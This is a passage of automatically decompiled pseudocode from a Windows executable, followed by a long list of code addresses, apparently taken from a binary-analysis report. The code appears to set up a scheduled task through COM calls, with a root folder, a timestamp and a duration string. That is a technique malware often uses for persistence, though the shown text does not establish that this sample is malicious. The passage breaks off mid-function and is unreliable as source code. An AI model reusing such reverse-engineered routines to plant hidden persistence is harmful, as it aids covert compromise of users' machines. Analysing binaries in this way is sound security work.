																																	asm("movups [eax], xmm0");
																																	_v100 = _v96(_v44, _t860, _v100, 6, 0,  &_v92);
																																	_t707 = _v104;
																																	_v116 = _t707;
																																	__eflags = _t707;
																																	if(_t707 != 0) {
																																		asm("lock xadd [eax+0x8], ecx");
																																		__eflags = (_t860 | 0xffffffff) == 1;
																																		if((_t860 | 0xffffffff) == 1) {
																																			__eflags = _t707;
																																			if(_t707 != 0) {
																																				_t866 =  *_t707;
																																				__eflags = _t866;
																																				if(_t866 != 0) {
																																					__imp__#6(_t866);
																																					_t707 = _v116;
																																					 *_t707 = 0;
																																				}
																																				_t867 =  *(_t707 + 4);
																																				__eflags = _t867;
																																				if(_t867 != 0) {
																																					L0132ECE6(_t867);
																																					_t707 = _v116;
																																					_t1015 = _t1015 + 4;
																																					 *(_v116 + 4) = 0;
																																				}
																																				_push(0xc);
																																				E0132EABA(_t707);
																																				_t1015 = _t1015 + 8;
																																			}
																																		}
																																		_v104 = 0;
																																	}
																																	_t708 =  &_v160;
																																	__imp__#9(_t708);
																																	asm("lock xadd [edi+0x8], eax");
																																	__eflags = (_t708 | 0xffffffff) == 1;
																																	if((_t708 | 0xffffffff) == 1) {
																																		_t728 =  *_t902;
																																		__eflags = _t728;
																																		if(_t728 != 0) {
																																			__imp__#6(_t728);
																																			 *_t902 = 0;
																																		}
																																		_t729 =  *(_t902 + 4);
																																		__eflags = _t729;
																																		if(_t729 != 0) {
																																			L0132ECE6(_t729);
																																			_t1015 = _t1015 + 4;
																																			 *(_t902 + 4) = 0;
																																		}
																																		_push(0xc);
																																		E0132EABA(_t902);
																																		_t1015 = _t1015 + 8;
																																	}
																																	_t918 = __imp__#9;
																																	_t712 =  *_t918( &_v176);
																																	asm("lock xadd [esi+0x8], eax");
																																	__eflags = (_t712 | 0xffffffff) == 1;
																																	if((_t712 | 0xffffffff) == 1) {
																																		_t724 =  *_t923;
																																		__eflags = _t724;
																																		if(_t724 != 0) {
																																			__imp__#6(_t724);
																																			 *_t923 = 0;
																																		}
																																		_t725 =  *(_t923 + 4);
																																		__eflags = _t725;
																																		if(_t725 != 0) {
																																			L0132ECE6(_t725);
																																			_t1015 = _t1015 + 4;
																																			 *(_t923 + 4) = 0;
																																		}
																																		_push(0xc);
																																		E0132EABA(_t923);
																																	}
																																	_v20 = 0xffffffff;
																																	 *_t918( &_v192);
																																	_t717 = _v44;
																																	 *((intOrPtr*)( *_t717 + 8))(_t717);
																																	_t719 = _v40;
																																	 *((intOrPtr*)( *_t719 + 8))(_t719);
																																	__eflags = _v100;
																																	if(_v100 < 0) {
																																		goto L73;
																																	} else {
																																		_t721 = _v92;
																																		 *((intOrPtr*)( *_t721 + 8))(_t721);
																																	}
																																	L74:
																																	 *[fs:0x0] = _v28;
																																	_pop(_t920);
																																	return E0132EA79(_v36 ^ _t963, _t920);
																																}
																															}
																														}
																													}
																												}
																											} else {
																												_t739 = _v60;
																												 *((intOrPtr*)( *_t739 + 8))(_t739);
																												goto L115;
																											}
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t755 = _v44;
																						 *((intOrPtr*)( *_t755 + 8))(_t755);
																						_t626 = _v52;
																						L71:
																						 *((intOrPtr*)( *_t626 + 8))(_t626);
																						_t480 = _v40;
																						goto L72;
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												} else {
													L36:
													_t480 = _v44;
													goto L72;
												}
											} else {
												_t480 = _v48;
												goto L72;
											}
										}
									} else {
										asm("xorps xmm0, xmm0");
										asm("movq [esi], xmm0");
										 *(_t923 + 8) = 0;
										 *(_t923 + 4) = 0;
										 *(_t923 + 8) = 1;
										__imp__#2("\\");
										 *_t923 = _t483;
										if(_t483 == 0) {
											L162:
											E0132FAD0(0x8007000e);
											L163:
											E0132FAD0(0x8007000e);
											L164:
											E0132FAD0(0x8007000e);
											L165:
											E0132FAD0(0x8007000e);
											L166:
											E0132FAD0(0x8007000e);
											asm("int3");
											asm("int3");
											_push(_t963);
											_t965 = _t989;
											_push(0xffffffff);
											_push(0x1366305);
											_push( *[fs:0x0]);
											_t490 =  *0x13a4018; // 0x39cca9f6
											_t491 = _t490 ^ _t965;
											_v452 = _t491;
											_push(_t923);
											_push(_t902);
											_push(_t491);
											 *[fs:0x0] =  &_v448;
											_t903 = _v428;
											asm("xorps xmm0, xmm0");
											_v528 = _t903;
											_v560 = _t903;
											asm("movlpd [ebp-0x30], xmm0");
											E0134A72C(_t791, _t876,  &_v484);
											_push( &_v484);
											_push( &_v520);
											E0134A14E();
											_t498 = _v516;
											_t991 = _t989 - 0x70 + 0xc;
											__eflags = _t498 - 0x3b;
											if(_t498 != 0x3b) {
												_t499 = _t498 + 1;
												__eflags = _t499;
												_v100 = _t499;
											} else {
												_t602 = _v96;
												__eflags = _t602 - 0x17;
												if(_t602 >= 0x17) {
													_v96 = 0;
													_v100 = 0;
												} else {
													_v100 = 0;
													_v96 = _t602 + 1;
												}
											}
											_v44 = 0;
											_v40 = 0xf;
											_v60 = 0;
											_t924 = E012F57D0(_t780, _t876, _t903, 0x110);
											_v44 = 0x104;
											_v108 = _t924;
											_v40 = 0x10f;
											E013478D0(_t903, _t924, 0, 0x104);
											 *((char*)(_t924 + 0x104)) = 0;
											E012F5760( &_v60,  &_v108);
											_v24 = 0;
											__eflags = _v40 - 0x10;
											_t506 =  >=  ? _v60 :  &_v60;
											_t507 = E0134A70D( >=  ? _v60 :  &_v60, _v44, "%Y-%m-%dT%H:%M:%S",  &_v104);
											_t992 = _t991 + 0x28;
											_push(0);
											__eflags = _t507;
											if(_t507 == 0) {
												 *(_t903 + 0x10) = 0;
												 *(_t903 + 0x14) = 7;
												 *_t903 = 0;
												E012F51B0(_t780, _t903, _t903, _t924, 0x13836c0);
												_t799 = _v40;
												__eflags = _t799 - 0x10;
												if(_t799 >= 0x10) {
													_t804 = _t799 + 1;
													__eflags = _t804;
													_push(_t804);
													goto L186;
												}
												goto L187;
											} else {
												_push(_t507);
												_t805 =  &_v60;
												L190();
												__eflags = _v40 - 0x10;
												_t514 =  >=  ? _v60 :  &_v60;
												_t927 =  &((E012F5640( >=  ? _v60 :  &_v60))[_v44]);
												__eflags = _v40 - 0x10;
												_t517 =  >=  ? _v60 :  &_v60;
												_t905 = E012F5640( >=  ? _v60 :  &_v60);
												_v120 = 0;
												_v116 = 7;
												_v136 = 0;
												_t992 = _t992 + 8;
												_t521 = _t927 - _t905;
												_v140 = _t521;
												__eflags = _t521 - 7;
												if(_t521 <= 7) {
													L180:
													_v112 =  &_v136;
													_v24 = 1;
													__eflags = _t905 - _t927;
													while(_t905 != _t927) {
														E012FC140(_t780,  &_v136, _t905, _t927,  *_t905 & 0x0000ffff);
														_t905 =  &(_t905[1]);
														__eflags = _t905 - _t927;
													}
													_t903 = _v144;
													asm("movups xmm0, [ebp-0x74]");
													_v136 = 0;
													_t524 = _v40;
													 *(_t903 + 0x10) = 0;
													 *(_t903 + 0x14) = 0;
													asm("movups [edi], xmm0");
													asm("movq xmm0, [ebp-0x64]");
													asm("movq [edi+0x10], xmm0");
													_v120 = 0;
													_v116 = 7;
													__eflags = _t524 - 0x10;
													if(_t524 >= 0x10) {
														_push(_t524 + 1);
														L186:
														E012F56A0(_t780, _t903, _v60);
													}
													L187:
													 *[fs:0x0] = _v32;
													_pop(_t925);
													__eflags = _v36 ^ _t965;
													return E0132EA79(_v36 ^ _t965, _t925);
												} else {
													__eflags = _t521 - 0x7ffffffe;
													if(__eflags > 0) {
														E012F4B30(_t805, __eflags);
														goto L189;
													} else {
														_t591 = _t521 | 0x00000007;
														__eflags = _t591 - 0x7ffffffe;
														if(__eflags <= 0) {
															__eflags = _t591 - 0xa;
															_t592 =  <  ? 0xa : _t591;
														} else {
															_t592 = 0x7ffffffe;
														}
														_v108 = _t592;
														_t805 =  ~(0 | __eflags > 0x00000000) | _t592 + 0x00000001;
														__eflags = _t805 - 0x7fffffff;
														if(_t805 > 0x7fffffff) {
															L189:
															E012F4A60();
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t965);
															_t967 = _t992;
															_t995 = _t992 - 0x14;
															_push(_t780);
															_t782 = _t805;
															_t807 = _v568;
															_t369 = _t782 + 0x10; // 0x10
															_t531 = _t369;
															_push(_t927);
															_t928 =  *_t531;
															_v584 = _t531;
															__eflags = _t807 - _t928;
															if(_t807 > _t928) {
																_t877 =  *(_t782 + 0x14);
																_push(_t905);
																_v44 = _t877;
																_t907 = _t807 - _t928;
																_v40 = _t907;
																__eflags = _t907 - _t877 - _t928;
																if(_t907 > _t877 - _t928) {
																	__eflags = 0x7fffffff - _t928 - _t907;
																	if(__eflags < 0) {
																		E012F4B30(_t807, __eflags);
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		_push(_t967);
																		_t968 = _t995;
																		_push(_t782);
																		_t783 = _t807;
																		_t808 = _v600;
																		_push(_t928);
																		_push(_t907);
																		_t908 = _v604;
																		_t878 =  *(_t783 + 0x14);
																		_t929 =  *((intOrPtr*)(_t783 + 0x10));
																		_v628 = _t908;
																		_v617 = _t808;
																		_v632 = _t878;
																		__eflags = _t908 - _t878 - _t929;
																		if(_t908 > _t878 - _t929) {
																			__eflags = 0x7fffffff - _t929 - _t908;
																			if(__eflags < 0) {
																				E012F4B30(_t808, __eflags);
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				_push(_t968);
																				_push(_t808);
																				_push(_t929);
																				_push(2);
																				_t930 = _t808;
																				_v652 = _t930;
																				_t542 = E012F8A40(_t783, _v640, 0, L"PT");
																				 *(_t930 + 0x10) = 0;
																				__eflags = 0;
																				 *(_t930 + 0x14) = 0;
																				asm("movups xmm0, [eax]");
																				asm("movups [esi], xmm0");
																				asm("movq xmm0, [eax+0x10]");
																				asm("movq [esi+0x10], xmm0");
																				 *(_t542 + 0x10) = 0;
																				 *(_t542 + 0x14) = 7;
																				 *_t542 = 0;
																				return _t930;
																			} else {
																				_t812 = _t929 + _t908 | 0x0000000f;
																				__eflags = _t812 - 0x7fffffff;
																				if(_t812 <= 0x7fffffff) {
																					_v32 = _t878 >> 1;
																					__eflags = _t878 - 0x7fffffff - _v32;
																					if(_t878 <= 0x7fffffff - _v32) {
																						_t549 = _v32 + _t878;
																						__eflags = _t812 - _t549;
																						_t813 =  <  ? _t549 : _t812;
																					} else {
																						_t813 = 0x7fffffff;
																					}
																				} else {
																					_t813 = 0x7fffffff;
																				}
																				_t421 = _t813 + 1; // 0x80000000
																				_v32 = _t813;
																				_t551 = E012F57D0(_t783, _t878, _t908, _t421);
																				_v40 = _t551;
																				 *((intOrPtr*)(_t783 + 0x10)) = _t929 + _t908;
																				__eflags = _v48 - 0x10;
																				 *(_t783 + 0x14) = _v32;
																				_v32 = _v33;
																				_push(_t929);
																				if(_v48 < 0x10) {
																					_push(_t783);
																					_push(_t551);
																					E01345ED0();
																					_t932 = _t929 + _v40;
																					__eflags = _t932;
																					E013478D0(_t908, _t932, _v32, _t908);
																					 *((char*)(_t932 + _t908)) = 0;
																					E012F5760(_t783,  &_v40);
																					return _t783;
																				} else {
																					_t910 =  *_t783;
																					_push( *_t783);
																					_push(_t551);
																					E01345ED0();
																					_t934 = _t929 + _v40;
																					E013478D0( *_t783, _t934, _v32, _v44);
																					 *((char*)(_t934 + _v44)) = 0;
																					_t561 = _v48 + 1;
																					__eflags = _t561;
																					_push(_t561);
																					E012F56A0(_t783,  *_t783, _t910);
																					 *_t783 = _v40;
																					return _t783;
																				}
																			}
																		} else {
																			_v32 = _t783;
																			 *((intOrPtr*)(_t783 + 0x10)) = _t908 + _t929;
																			_t566 = _t783;
																			__eflags = _t878 - 0x10;
																			if(_t878 >= 0x10) {
																				_t566 =  *_t783;
																				_v32 =  *_t783;
																			}
																			E013478D0(_t908, _t566 + _t929, _t808, _t908);
																			_t819 = _v32 + _t908;
																			__eflags = _t819;
																			 *((char*)(_t819 + _t929)) = 0;
																			return _t783;
																		}
																	} else {
																		_t820 = _t807 | 0x0000000f;
																		__eflags = _t820 - 0x7fffffff;
																		if(_t820 <= 0x7fffffff) {
																			_v28 = _t877 >> 1;
																			__eflags = _t877 - 0x7fffffff - _v28;
																			if(_t877 <= 0x7fffffff - _v28) {
																				_t574 = _v28 + _t877;
																				__eflags = _t820 - _t574;
																				_t821 =  <  ? _t574 : _t820;
																			} else {
																				_t821 = 0x7fffffff;
																			}
																		} else {
																			_t821 = 0x7fffffff;
																		}
																		_t382 = _t821 + 1; // 0x80000000
																		_v28 = _t821;
																		_t576 = E012F57D0(_t782, _t877, _t907, _t382);
																		__eflags = _v44 - 0x10;
																		_v36 = _t576;
																		 *_v32 = _v16;
																		 *(_t782 + 0x14) = _v28;
																		_v32 = _v12;
																		_push(_t928);
																		if(_v44 < 0x10) {
																			_push(_t782);
																			_push(_t576);
																			E01345ED0();
																			_t937 = _t928 + _v36;
																			__eflags = _t937;
																			E013478D0(_t907, _t937, _v32, _t907);
																			 *((char*)(_t937 + _t907)) = 0;
																			return E012F5760(_t782,  &_v36);
																		} else {
																			_t914 =  *_t782;
																			_push( *_t782);
																			_push(_t576);
																			E01345ED0();
																			_t939 = _t928 + _v36;
																			E013478D0( *_t782, _t939, _v32, _v40);
																			 *((char*)(_t939 + _v40)) = 0;
																			_t585 = _v44 + 1;
																			__eflags = _t585;
																			_push(_t585);
																			E012F56A0(_t782,  *_t782, _t914);
																			_t587 = _v36;
																			 *_t782 = _t587;
																			return _t587;
																		}
																	}
																} else {
																	 *_v32 = _t807;
																	__eflags = _t877 - 0x10;
																	if(_t877 >= 0x10) {
																		_t782 =  *_t782;
																	}
																	_t941 = _t928 + _t782;
																	__eflags = _t941;
																	_t590 = E013478D0(_t907, _t941, _v12, _t907);
																	 *((char*)(_t941 + _t907)) = 0;
																	return _t590;
																}
															} else {
																__eflags =  *(_t782 + 0x14) - 0x10;
																if( *(_t782 + 0x14) >= 0x10) {
																	_t782 =  *_t782;
																}
																 *_t531 = _t807;
																 *((char*)(_t782 + _t807)) = 0;
																return _t531;
															}
														} else {
															_t829 = E012F57D0(_t780, _t876, _t905, _t805 + _t805);
															_v120 = _v140;
															_v116 = _v108;
															 *_t829 = _v136;
															_v112 = _t829;
															E012F5760( &_v136,  &_v112);
															_t992 = _t992 + 0xc;
															_v120 = 0;
															goto L180;
														}
													}
												}
											}
										} else {
											goto L13;
										}
									}
								}
							}
						}
					}
				}
			}

0x012faee3
0x012faeea
0x012faf01
0x012faf02
0x012faeec
0x012faeec
0x012faef3
0x00000000
0x012faef5
0x012faef5
0x012faef8
0x012faefb
0x01302620
0x01302621
0x01302629
0x01302630
0x01302634
0x01302636
0x01302638
0x01302643
0x01302644
0x01302645
0x0130264b
0x01302650
0x01302652
0x01302656
0x01302657
0x0130265b
0x01302661
0x01302664
0x01302667
0x0130266a
0x01302671
0x01302674
0x01302677
0x01302baa
0x00000000
0x0130268f
0x01302693
0x013026ab
0x013026b1
0x013026b4
0x013026ca
0x013026d2
0x00000000
0x013026d8
0x013026db
0x013026ed
0x013026ef
0x013026fc
0x01302704
0x0130270b
0x0130270d
0x0130271b
0x01302722
0x01302724
0x01302732
0x01302736
0x01302738
0x0130273f
0x0130274b
0x01302753
0x0130275a
0x0130275f
0x01302762
0x01302766
0x0130276b
0x01302775
0x01302778
0x0130277a
0x01302780
0x01302789
0x01302792
0x0130279b
0x013027a3
0x013027ab
0x013027ad
0x013027b0
0x013027b2
0x01302ba4
0x01302ba7
0x00000000
0x013027b8
0x013027b8
0x013027c3
0x013027c6
0x013027cb
0x013027cd
0x013027d0
0x013027d3
0x013027dc
0x01302811
0x01302811
0x01302813
0x01302813
0x0130281a
0x0130281f
0x00000000
0x01302825
0x01302828
0x01302835
0x01302839
0x01302840
0x01302844
0x01302849
0x0130284f
0x01302851
0x01302855
0x01302858
0x0130285e
0x0130285e
0x01302864
0x01302869
0x0130286c
0x01302871
0x01302874
0x01302874
0x0130287b
0x0130287e
0x01302883
0x01302883
0x0130288a
0x01302899
0x0130289c
0x0130289f
0x013028a1
0x013028a5
0x013028a7
0x013028a7
0x013028ad
0x013028b2
0x013028b9
0x013028bb
0x013028bd
0x013028c3
0x013028c3
0x013028bf
0x013028bf
0x013028bf
0x013028cb
0x013028cd
0x013028d4
0x013028d7
0x013028d9
0x013028dd
0x013028e2
0x013028e3
0x013028e5
0x013028e7
0x013028e9
0x013028eb
0x013028ed
0x013028f0
0x013028f6
0x013028f6
0x013028fc
0x013028ff
0x01302901
0x01302904
0x01302909
0x0130290c
0x0130290c
0x01302913
0x01302916
0x0130291b
0x0130291b
0x013028e7
0x013028e3
0x0130291e
0x01302925
0x01302931
0x01302934
0x0130293c
0x0130293f
0x01302941
0x0130294b
0x01302951
0x0130295c
0x0130295f
0x01302961
0x00000000
0x01302963
0x01302963
0x0130296b
0x0130296e
0x01302974
0x01302977
0x0130297d
0x01302988
0x0130298b
0x0130298d
0x01302e86
0x01302e86
0x00000000
0x01302993
0x01302993
0x01302999
0x0130299c
0x013029a2
0x013029ad
0x013029b0
0x013029b2
0x00000000
0x013029b8
0x013029b8
0x013029bf
0x013029cb
0x013029ce
0x013029d6
0x013029d9
0x013029db
0x00000000
0x013029e1
0x013029e1
0x013029e8
0x013029f7
0x013029f9
0x013029fc
0x013029ff
0x01302a01
0x01302a04
0x01302a06
0x00000000
0x01302a0c
0x01302a16
0x01302a19
0x01302a1e
0x01302a20
0x01302a23
0x01302a26
0x01302a2d
0x01302a2f
0x01302a64
0x01302a64
0x00000000
0x01302a31
0x01302a31
0x01302a34
0x01302a38
0x01302a44
0x01302a4b
0x01302a52
0x01302a58
0x01302a5a
0x01302a5c
0x00000000
0x01302a62
0x01302a66
0x01302a66
0x01302a6d
0x01302a70
0x01302a72
0x00000000
0x01302a78
0x01302a78
0x01302a84
0x01302a87
0x01302a90
0x01302a95
0x01302a96
0x01302a98
0x01302a9a
0x01302a9c
0x01302a9f
0x01302aa5
0x01302aa5
0x01302aab
0x01302aae
0x01302ab0
0x01302ab3
0x01302ab8
0x01302abb
0x01302abb
0x01302ac2
0x01302ac5
0x01302aca
0x01302aca
0x01302ad0
0x01302ad3
0x01302ad6
0x01302ad9
0x01302ada
0x01302adf
0x01302ae6
0x01302aea
0x01302aec
0x01302aec
0x01302af2
0x01302af7
0x01302afb
0x01302afd
0x01302aff
0x01302b05
0x01302b05
0x01302b01
0x01302b01
0x01302b01
0x01302b0b
0x01302b0d
0x01302b10
0x01302b12
0x01302b16
0x01302b1b
0x01302b1c
0x01302b1e
0x01302b20
0x01302b22
0x01302b24
0x01302b26
0x01302b29
0x01302b2f
0x01302b2f
0x01302b35
0x01302b38
0x01302b3a
0x01302b3d
0x01302b42
0x01302b45
0x01302b45
0x01302b4c
0x01302b4f
0x01302b54
0x01302b54
0x01302b20
0x01302b57
0x01302b57
0x01302b5e
0x01302b65
0x01302b68
0x01302b6b
0x01302b74
0x01302b78
0x01302b7d
0x01302b7d
0x01302b80
0x01302b88
0x01302b8b
0x01302b8d
0x01302bcc
0x01302bd2
0x01302bdd
0x01302be0
0x01302be8
0x01302beb
0x01302bed
0x00000000
0x01302bf3
0x01302c01
0x01302c04
0x01302c09
0x01302c10
0x01302c17
0x01302c1f
0x01302c2d
0x01302c34
0x01302c3b
0x01302c47
0x01302c4e
0x01302c53
0x01302c56
0x01302c5a
0x01302c5e
0x01302c60
0x01302c60
0x01302c66
0x01302c6b
0x01302c6f
0x01302c71
0x01302c73
0x01302c79
0x01302c79
0x01302c75
0x01302c75
0x01302c75
0x01302c7f
0x01302c81
0x01302c84
0x01302c87
0x01302c89
0x01302c8d
0x01302c92
0x01302c93
0x01302c95
0x01302c97
0x01302c99
0x01302c9b
0x01302c9d
0x01302ca0
0x01302ca6
0x01302ca6
0x01302cac
0x01302caf
0x01302cb1
0x01302cb4
0x01302cb9
0x01302cbc
0x01302cbc
0x01302cc3
0x01302cc6
0x01302ccb
0x01302ccb
0x01302c97
0x01302cce
0x01302cce
0x01302cd5
0x01302cd8
0x01302cdb
0x01302ce4
0x01302ce8
0x01302ced
0x01302ced
0x01302cf2
0x01302cf9
0x01302cfd
0x01302d03
0x01302d0a
0x01302d0d
0x01302d16
0x01302d1d
0x01302d22
0x01302d22
0x01302d27
0x01302d2e
0x01302d35
0x01302d3b
0x01302d45
0x01302d4f
0x01302d52
0x01302d5b
0x01302d62
0x01302d67
0x01302d67
0x01302d6a
0x01302d70
0x01302d73
0x01302d77
0x00000000
0x01302d7d
0x01302d7d
0x01302d83
0x01302d8e
0x01302d91
0x01302d93
0x00000000
0x01302d99
0x01302d99
0x01302da0
0x01302dac
0x01302daf
0x01302db7
0x01302dba
0x01302dbc
0x00000000
0x01302dc2
0x01302dc2
0x01302dc9
0x01302dd8
0x01302dda
0x01302de2
0x01302de5
0x01302de7
0x00000000
0x01302ded
0x01302df2
0x01302df5
0x01302df8
0x01302dfc
0x01302dfe
0x01302dfe
0x01302e04
0x01302e09
0x01302e10
0x01302e12
0x01302e14
0x01302e1a
0x01302e1a
0x01302e16
0x01302e16
0x01302e16
0x01302e20
0x01302e22
0x01302e29
0x01302e2c
0x01302e2f
0x01302e31
0x01302e35
0x01302e3a
0x01302e3b
0x01302e3d
0x01302e3f
0x01302e41
0x01302e43
0x01302e45
0x01302e48
0x01302e4e
0x01302e4e
0x01302e54
0x01302e57
0x01302e59
0x01302e5c
0x01302e61
0x01302e64
0x01302e64
0x01302e6b
0x01302e6e
0x01302e73
0x01302e76
0x01302e76
0x01302e3f
0x01302e3b
0x01302e79
0x01302e7b
0x01302e8e
0x01302e91
0x01302e98
0x01302e9b
0x01302e9d
0x01302e9f
0x01302ea7
0x01302ead
0x01302eb6
0x01302eb6
0x01302ebc
0x01302ec1
0x01302ecf
0x01302ed6
0x01302ed9
0x01302edc
0x01302ee2
0x01302ee8
0x01302eea
0x00000000
0x01302ef0
0x01302ef0
0x01302ef7
0x01302f00
0x01302f04
0x01302f09
0x01302f0b
0x01302f0e
0x01302f11
0x01302f15
0x01302f17
0x01302f43
0x01302f43
0x01302f19
0x01302f19
0x01302f1c
0x01302f20
0x01302f2c
0x01302f33
0x01302f3a
0x01302f3f
0x01302f3f
0x01302f45
0x01302f49
0x01302f4c
0x01302f4e
0x00000000
0x01302f54
0x01302f54
0x01302f58
0x01302f5f
0x01302f61
0x01302f63
0x01302f6e
0x01302f76
0x01302f7c
0x01302f82
0x01302f84
0x00000000
0x00000000
0x00000000
0x00000000
0x01302f65
0x01302f65
0x01302f8a
0x01302f8a
0x01302f8e
0x01302f97
0x01302fa3
0x01302fa5
0x01302fa8
0x01302fab
0x01302faf
0x01302fb1
0x01302fdd
0x01302fdd
0x01302fb3
0x01302fb3
0x01302fb6
0x01302fba
0x01302fc6
0x01302fcd
0x01302fd9
0x01302fd9
0x01302fdf
0x01302fe3
0x01302fe6
0x01302fe8
0x00000000
0x01302fee
0x01302fee
0x01302ff7
0x01302ffe
0x01303000
0x01303003
0x01303005
0x01303048
0x01303052
0x01303058
0x0130305e
0x01303060
0x00000000
0x01303066
0x00000000
0x01303066
0x01303007
0x01303007
0x0130300d
0x0130300d
0x01303014
0x0130301b
0x0130301e
0x01303021
0x01303028
0x0130302c
0x0130302e
0x0130302e
0x01303034
0x01303039
0x0130303d
0x0130303f
0x01303041
0x01303068
0x01303068
0x01303043
0x01303043
0x01303043
0x0130306a
0x0130307c
0x01303081
0x01303084
0x0130308b
0x01303090
0x0130309c
0x013030a6
0x013030a9
0x013030ac
0x013030af
0x013030b1
0x013030b6
0x013030bb
0x013030bc
0x013030be
0x013030c0
0x013030c2
0x013030c4
0x013030c6
0x013030c9
0x013030cf
0x013030d2
0x013030d2
0x013030d8
0x013030db
0x013030dd
0x013030e0
0x013030e5
0x013030e8
0x013030eb
0x013030eb
0x013030f2
0x013030f5
0x013030fa
0x013030fa
0x013030c0
0x013030fd
0x013030fd
0x01303104
0x0130310b
0x01303114
0x01303119
0x0130311a
0x0130311c
0x0130311e
0x01303120
0x01303123
0x01303129
0x01303129
0x0130312f
0x01303132
0x01303134
0x01303137
0x0130313c
0x0130313f
0x0130313f
0x01303146
0x01303149
0x0130314e
0x0130314e
0x01303151
0x0130315e
0x01303163
0x01303168
0x01303169
0x0130316b
0x0130316d
0x0130316f
0x01303172
0x01303178
0x01303178
0x0130317e
0x01303181
0x01303183
0x01303186
0x0130318b
0x0130318e
0x0130318e
0x01303195
0x01303198
0x0130319d
0x013031a6
0x013031ae
0x013031b0
0x013031b6
0x013031b9
0x013031bf
0x013031c2
0x013031c6
0x00000000
0x013031cc
0x013031cc
0x013031d2
0x013031d5
0x01302bac
0x01302baf
0x01302bb8
0x01302bc9
0x01302bc9
0x01303005
0x01302fe8
0x01302f63
0x01302f4e
0x01302e7d
0x01302e7d
0x01302e83
0x00000000
0x01302e83
0x01302e7b
0x01302de7
0x01302dbc
0x01302d93
0x01302d77
0x01302b8f
0x01302b8f
0x01302b95
0x01302b98
0x01302b9b
0x01302b9e
0x01302ba1
0x00000000
0x01302ba1
0x01302b8d
0x01302a72
0x01302a5c
0x01302a2f
0x01302a06
0x013029db
0x013029b2
0x0130298d
0x01302943
0x01302943
0x01302943
0x00000000
0x01302943
0x0130288c
0x0130288c
0x00000000
0x0130288c
0x0130288a
0x013027de
0x013027de
0x013027e1
0x013027e5
0x013027f1
0x013027f8
0x013027ff
0x01302805
0x01302809
0x013031dc
0x013031e1
0x013031e6
0x013031eb
0x013031f0
0x013031f5
0x013031fa
0x013031ff
0x01303204
0x01303209
0x0130320e
0x0130320f
0x01303210
0x01303211
0x01303213
0x01303215
0x01303220
0x01303224
0x01303229
0x0130322b
0x0130322e
0x0130322f
0x01303230
0x01303234
0x0130323a
0x01303240
0x01303243
0x01303247
0x0130324a
0x0130324f
0x01303257
0x0130325b
0x0130325c
0x01303261
0x01303264
0x01303267
0x0130326a
0x01303291
0x01303291
0x01303292
0x0130326c
0x0130326c
0x0130326f
0x01303272
0x01303281
0x01303288
0x01303274
0x01303275
0x0130327c
0x0130327c
0x01303272
0x0130329a
0x013032a1
0x013032a8
0x013032b6
0x013032b8
0x013032c2
0x013032c5
0x013032cc
0x013032d4
0x013032e0
0x013032e8
0x013032ef
0x013032f7
0x01303304
0x01303309
0x0130330c
0x0130330e
0x01303310
0x0130344b
0x01303452
0x01303460
0x01303463
0x01303468
0x0130346b
0x0130346e
0x01303470
0x01303470
0x01303471
0x00000000
0x01303471
0x00000000
0x01303316
0x01303316
0x01303317
0x0130331a
0x0130331f
0x01303326
0x01303335
0x01303338
0x0130333c
0x01303346
0x01303348
0x01303351
0x01303358
0x0130335c
0x01303361
0x01303363
0x01303366
0x01303369
0x013033e4
0x013033e7
0x013033ea
0x013033ee
0x013033f0
0x013033fd
0x01303402
0x01303403
0x01303403
0x01303407
0x0130340c
0x01303410
0x01303414
0x01303417
0x0130341e
0x01303425
0x01303428
0x0130342d
0x01303432
0x01303439
0x01303440
0x01303443
0x01303446
0x01303472
0x01303475
0x0130347a
0x0130347d
0x01303482
0x0130348b
0x0130348f
0x01303499
0x0130336b
0x0130336b
0x01303370
0x0130349c
0x00000000
0x01303376
0x01303376
0x01303379
0x0130337e
0x0130338c
0x0130338e
0x01303380
0x01303380
0x01303380
0x01303393
0x0130339e
0x013033a0
0x013033a6
0x013034a1
0x013034a1
0x013034a6
0x013034a7
0x013034a8
0x013034a9
0x013034aa
0x013034ab
0x013034ac
0x013034ad
0x013034ae
0x013034af
0x013034b0
0x013034b1
0x013034b3
0x013034b6
0x013034b7
0x013034b9
0x013034bc
0x013034bc
0x013034bf
0x013034c0
0x013034c2
0x013034c5
0x013034c7
0x013034df
0x013034e4
0x013034e7
0x013034ea
0x013034ee
0x013034f1
0x013034f3
0x01303526
0x01303528
0x013035fb
0x01303600
0x01303601
0x01303602
0x01303603
0x01303604
0x01303605
0x01303606
0x01303607
0x01303608
0x01303609
0x0130360a
0x0130360b
0x0130360c
0x0130360d
0x0130360e
0x0130360f
0x01303610
0x01303611
0x01303616
0x01303617
0x01303619
0x0130361c
0x0130361d
0x0130361e
0x01303621
0x01303626
0x0130362b
0x0130362e
0x01303631
0x01303634
0x01303636
0x01303679
0x0130367b
0x01303753
0x01303758
0x01303759
0x0130375a
0x0130375b
0x0130375c
0x0130375d
0x0130375e
0x0130375f
0x01303760
0x01303763
0x01303764
0x01303765
0x01303767
0x01303773
0x01303776
0x0130377b
0x01303782
0x01303784
0x0130378b
0x0130378e
0x01303791
0x01303796
0x0130379b
0x013037a2
0x013037a9
0x013037b2
0x01303681
0x01303684
0x01303687
0x0130368d
0x0130369a
0x013036a5
0x013036a7
0x013036b3
0x013036b5
0x013036b7
0x013036a9
0x013036a9
0x013036a9
0x0130368f
0x0130368f
0x0130368f
0x013036ba
0x013036bd
0x013036c1
0x013036c9
0x013036cf
0x013036d2
0x013036d9
0x013036e0
0x013036e3
0x013036e4
0x01303723
0x01303724
0x01303725
0x0130372a
0x0130372a
0x01303732
0x0130373a
0x01303740
0x01303750
0x013036e6
0x013036e6
0x013036e8
0x013036e9
0x013036ea
0x013036f2
0x013036f9
0x01303701
0x01303708
0x01303708
0x01303709
0x0130370b
0x01303716
0x01303720
0x01303720
0x013036e4
0x01303638
0x01303638
0x0130363e
0x01303641
0x01303643
0x01303646
0x01303648
0x0130364a
0x0130364a
0x01303656
0x01303661
0x01303661
